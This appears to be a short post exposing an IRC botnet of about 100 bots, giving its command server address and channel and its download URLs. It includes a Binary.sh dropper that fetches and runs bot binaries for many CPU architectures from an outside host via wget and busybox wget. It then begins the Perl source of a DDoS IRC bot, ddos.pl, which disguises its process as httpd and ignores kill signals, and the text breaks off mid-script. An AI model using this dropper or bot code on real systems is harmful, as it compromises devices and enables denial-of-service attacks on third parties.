Around 100 hydra bots inside.
Server : 149.91.89.253:6667
Channel : #perls
Url’s :
hxxp://208.67.1.142/ddos.pl
hxxp://208.67.1.142/hack/ u can get the rest of files here
Binary.sh :
cd /tmp && wget -q hxxp://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel
cd /tmp && wget -q hxxp://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips
cd /tmp && wget -q hxxp://208.67.1.142/hack/telsh4 && chmod +x telsh4 && ./telsh4
cd /tmp && wget -q hxxp://208.67.1.142/hack/telx86 && chmod +x telx86 && ./telx86
cd /tmp && wget -q hxxp://208.67.1.142/hack/telarmv6 && chmod +x telarmv6 && ./telarmv6
cd /tmp && wget -q hxxp://208.67.1.142/hack/teli686 && chmod +x teli686 && ./teli686
cd /tmp && wget -q hxxp://208.67.1.142/hack/telpowerpc && chmod +x telpowerpc && ./telpowerpc
cd /tmp && wget -q hxxp://208.67.1.142/hack/teli586 && chmod +x teli586 && ./teli586
cd /tmp && wget -q hxxp://208.67.1.142/hack/telm86k && chmod +x telm86k && ./telm86k
cd /tmp && wget -q hxxp://208.67.1.142/hack/telsparc && chmod +x telsparc && ./telsparc
cd /tmp && wget -q hxxp://208.67.1.142/hack/telarmv5l && chmod +x telarmv5l && ./telarmv5l
cd /tmp && wget -q hxxp://208.67.1.142/hack/telarmv4l && chmod +x telarmv4l && ./telarmv4l
rm -rf tel*
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telsh4 && chmod +x telsh4 && ./telsh4
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telx86 && chmod +x telx86 && ./telx86
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telarmv6 && chmod +x telarmv6 && ./telarmv6
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/teli686 && chmod +x teli686 && ./teli686
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telpowerpc && chmod +x telpowerpc && ./telpowerpc
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/teli586 && chmod +x teli586 && ./teli586
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telm86k && chmod +x telm86k && ./telm86k
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telsparc && chmod +x telsparc && ./telsparc
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telarmv5l && chmod +x telarmv5l && ./telarmv5l
cd /tmp && busybox wget -q hxxp://208.67.1.142/hack/telarmv4l && chmod +x telarmv4l && ./telarmv4l
rm -rf tel*
ddos.pl :
#!/usr/bin/perl
############################################
my $processo = ‘usr/sbin/httpd’;
my $linas_max=’10’;
my $sleep=’5′;
my $cmd=””;
my $id=””;
############################################
my @adms=(“john”);
my @canais=(“#perls”);
my $chanpass = “”;
##Cron
$num = int rand(99999);
my $nick = “[-]” . $num . “”;
#Nickname of bot
my $ircname ='[HACKED]’;
chop (my $realname = ‘[IMGAY]’);
#IRC name and Realname
$servidor=’149.91.89.253′ unless $servidor;
my $porta=’6667′;
############################################
$SIG{‘INT’} = ‘IGNORE’;
$SIG{‘HUP’} = ‘IGNORE’;
$SIG{‘TERM’} = ‘IGNORE’;
$SIG{‘CHLD’} = ‘IGNORE’;
$SIG{‘PS’} = ‘IGNORE’;
use IO::Socket;
use Socket;
use IO::Select;
chdir(“/”);
#Connect
$servidor=”$ARGV[0]” if $ARGV[0];
$0=”$processo”.”